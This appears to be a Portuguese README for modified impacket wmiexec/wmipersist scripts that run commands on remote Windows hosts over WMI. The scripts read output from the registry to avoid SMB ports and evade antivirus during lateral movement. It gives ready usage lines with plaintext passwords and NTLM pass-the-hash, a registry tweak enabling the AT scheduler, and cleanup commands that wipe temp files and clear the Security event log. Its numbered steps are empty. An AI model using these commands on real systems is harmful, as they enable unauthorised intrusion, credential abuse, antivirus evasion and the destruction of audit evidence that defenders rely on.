
Versão modificada do impacket wmiexec.py, obtém saída (dados, resposta) do registro, não precisa de conexão SMB, também contorna antivírus em movimento lateral como WMIHACKER.
Versão modificada do impacket wmiexec.py, wmipersist.py. Obtém saída (dados, resposta) do registro, não precisa de conexão SMB, mas estou no código ruim :(
No wmiexec.py original, ele obtém resposta da conexão smb (portas 445,139). Infelizmente, alguns antivírus estão monitorando essas portas como alto risco.
Neste caso, eu removi a função de conexão smb e usei outros métodos para executar comandos.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (Altamente recomendado, !!!funciona apenas no impacket v0.9.24!!!): Uma versão Python do WMIHACKER, do qual peguei o template vbs. O atacante pode usá-lo para movimento lateral seguro sob antivírus em execução.
wmiexec-regOut.py: Apenas um exemplo simples do método Win32_Process.create.
Passo 1:
Passo 2:
Passo 3:
Passo 4:
Passo 5:
Passo 1:
Passo 2:
Passo 3:
Geralmente, você só precisa instalar o impacket oficial.
Com senha em texto claro
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

Com hashes NTLM
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Com senha em texto claro (sem saída)
python3 wmipersist-wip.py administrator:[email protected] 'command'

Com hashes NTLM
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Com saída
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Sob o antivírus Huorong (Usando o template VBS do WMIHACKER!!!)

Não se esqueça de limpar o diretório temporário após executar o comando com saída.
Comando: del /q /f /s C:\windows\temp\*

Comando inclui aspas duplas.
Coloque aspas duplas dentro de aspas simples wevtutil cl '"security"'
